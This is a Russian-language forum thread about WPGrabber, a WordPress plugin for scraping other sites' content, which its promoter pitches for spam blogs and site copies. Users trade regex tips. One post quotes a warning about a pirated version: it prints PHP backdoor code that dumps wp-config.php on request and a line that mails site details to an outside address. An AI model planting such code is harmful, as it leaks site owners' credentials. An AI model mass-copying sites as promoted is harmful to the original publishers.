Плагин WPGrabber Плагин граббинга для WordPress

Sawa111 · 1 Фев 2015

WPGrabber - плагин граббинга контента для CMS WordPress

С помощью плагина WPGrabber Вы сможете быстро наполнить свой блог на WordPress информацией с любых других сайтов!
Основные возможности плагина WPGrabber

импорт контента в блог с любых HTML-сайтов
импорта контента в блог с любых RSS-потоков
импорт контента в блог со стен групп и сообществ соц. сети Вконтакте.ру
возможность сохранения изображений из импортируемого текста у вас на сервере
возможность перевода импортируемого контента на лету (поддержка более чем 20 языковых пар, функция двойного перевода для получения уникальных текстов)
фильтрация сохраняемого у вас в блоге контента по словам, а также по наличию изображений в тексте.
гибкие настройки обработки импортируемого текста (удаление из получаемого текста ненужных блоков информации, ссылок, картинок и т.д.)
поддержка режима автоматической работы обновления информации с других сайтов
интеграция с WordPress (поддержка Custom Post Types, поддержка Post Status, генерация алиасов для URL'ов записей в режиме ЧПУ)

Зачем мне нужен этот плагин?
Основная функция плагина конечно же наполнять ваш блог информацией с других сайтов. Однако учитывая весь функционал плагина можно предложить его использование для:

наполнения СПЛОГОВ, ГС и любых других сайтов информацией с других сайтов, блогов, rss-потоков, стен вконтакте.
ведения полнотекстовых новостных колонок у себя в блоге используя информацию с других сайтов
создания локализованных версий сайтов при помощи встроенной системы перевода контента "на лету"
создание информационных копий других сайтов

svitlo1 · 17 Апр 2020

Подскажите пожалуйста каким плагином реально спарсить посты из группы фейсбук не создавая приложение?

Bahus7 · 17 Апр 2020

Если не сложно, помогите со сложным вариативным шаблоном ссылок.
Индекс Для просмотра ссылки Войди или Зарегистрируйся
Варианты ссылок:

Код:

https://ufa.rbc.ru/ufa/14/04/2020/5e95b2a89a79473fd011825b
https://perm.rbc.ru/perm/freenews/5e95ad899a79473cb6967840
https://ufa.rbc.ru/ufa/freenews/5e902a879a79479b1cf0e9d5
https://www.rbc.ru/finances/09/04/2020/5e8dad639a79470de70eba55
https://perm.rbc.ru/perm/freenews/5e8b08b99a7947695fe95c7f
https://t.rbc.ru/tyumen/06/04/2020/5e8ab3299a79473567e0b2db

Сделал:

Код:

https:\/\/(ufa.rbc.ru|perm.rbc.ru|www.rbc.ru|t.rbc.ru)\/(ufa|perm|finances|tyumen)\/([\d]{2}\/[\d]{2}\/[\d]{4}|freenews)\/[\w]{20,}

Для просмотра ссылки Войди или Зарегистрируйся
В отладке все работает, но лента пишет

Пустой контент RSS-ленты или индексной HTML-страницы Для просмотра ссылки Войди или Зарегистрируйся

Сменил метод на CURL. Ссылки видит правильно, но не определяет заголовок с простейшими тегами по стандартной регулярке

Код:

<h1 class="js-slide-title" itemprop="headline">(.*?)</h1>

Помогите плз. :thenks:

P.S. Как победить динамические классы в регулярках начала и конца текста?

metal-stroi-komplekt · 17 Апр 2020

svitlo1 написал(а):
Подскажите пожалуйста каким плагином реально спарсить посты из группы фейсбук не создавая приложение?

никаким. Цукерман постоянно меняет как html-теги, так и алгоритмы,подгружаемые скриптом после формирования страницы и т.д. Аяксовые штуки вообще пока мало кто парсить умеет, под заказ, вряд ли потянете ценник))

svitlo1 · 17 Апр 2020

metal-stroi-komplekt написал(а):
никаким. Цукерман постоянно меняет как html-теги, так и алгоритмы,подгружаемые скриптом после формирования страницы и т.д. Аяксовые штуки вообще пока мало кто парсить умеет, под заказ, вряд ли потянете ценник))

Спасибо за исчерпывающий ответ... да страници я парсил плагином .... а вот с групами гемор.... да и страници перестало парсить))) потому и возник вопрос ...... или я ..... или лыжи не едут)

itservice · 17 Апр 2020

Bahus7 написал(а):
Если не сложно, помогите со сложным вариативным шаблоном ссылок.
Индекс Для просмотра ссылки Войди или Зарегистрируйся
Варианты ссылок:
Сделал:

Код:

https:\/\/(ufa.rbc.ru|perm.rbc.ru|www.rbc.ru|t.rbc.ru)\/(ufa|perm|finances|tyumen)\/([\d]{2}\/[\d]{2}\/[\d]{4}|freenews)\/[\w]{20,}

Для просмотра ссылки Войди или Зарегистрируйся
В отладке все работает, но лента пишет

Сменил метод на CURL. Ссылки видит правильно, но не определяет заголовок с простейшими тегами по стандартной регулярке

Код:

<h1 class="js-slide-title" itemprop="headline">(.*?)</h1>

Помогите плз.

P.S. Как победить динамические классы в регулярках начала и конца текста?

Шаблон заголовка

Код:

<meta property="og:title" content="(.*?)"

Evgennn32 · 18 Апр 2020

Есть версия 5.3 wp-grabber, может кто проверить на безопасность и стучалки?

irootssh · 18 Апр 2020

Evgennn32 написал(а):
Есть версия 5.3 wp-grabber, может кто проверить на безопасность и стучалки?

Из этой ссылки? Для просмотра ссылки Войди или Зарегистрируйся

irootssh · 18 Апр 2020

antonyz написал(а):
Внимание! Эта версия ворует пароли.
Строка 71 файла test.php
---------------
if($_GET['up']==invor1) {
$h = fopen("../../../wp-config.php","r");
while (!feof ($h))
{
$content = fgets($h);
echo $content,"<br>";
}
fclose($h);
}
---------------

Версия Для просмотра ссылки Войди или Зарегистрируйся аналогичные строки, может проще test.php удалить?)
В init.php тоже всё на своём месте:
@mail("expertsforex@gmail.com", "re:", "wpgrabber4.9.8 ".$name." ip=".$name1." Directory ".$name2);

KoRn0509 · 19 Апр 2020

Приветствую. Такая ситуёвина. Плагин версии 4.9.8 Настроил граббинг все ок. Но есть маленькое но. Если в настройках стоит папка для загрузок картинок по умолчанию, то есть wp-content/uploads то все картинки которые присутствуют в статье, без проблем появляются в папке, регистрируются в медиафайлах. Так же создаются картинки разного разрешения, как бы все ок. Ах да, самое главное, что присутствует миниатюра записи. Но если указать папку отличную от предыдущей к примеру wp-content/uploads/news то картинки создаться в ней, но не регистрируются в медиафайлах, соответственно не создаются картинки других разрешений (хрен бы с ними), но самое печально что не создаются миниатюры для записей. Как это можно исправить?

Evgennn32 · 21 Апр 2020

irootssh написал(а):
Из этой ссылки? Для просмотра ссылки Войди или Зарегистрируйся

нет, повзаимствовал у клиента.

Плагин WPGrabber Плагин граббинга для WordPress

Sawa111

Создатель

Вложения

svitlo1

Постоялец

Bahus7

Постоялец

metal-stroi-komplekt

Гуру форума

svitlo1

Постоялец

itservice

Постоялец

Evgennn32

Создатель

irootssh

Писатель

irootssh

Писатель

Вложения

KoRn0509

Создатель

Evgennn32

Создатель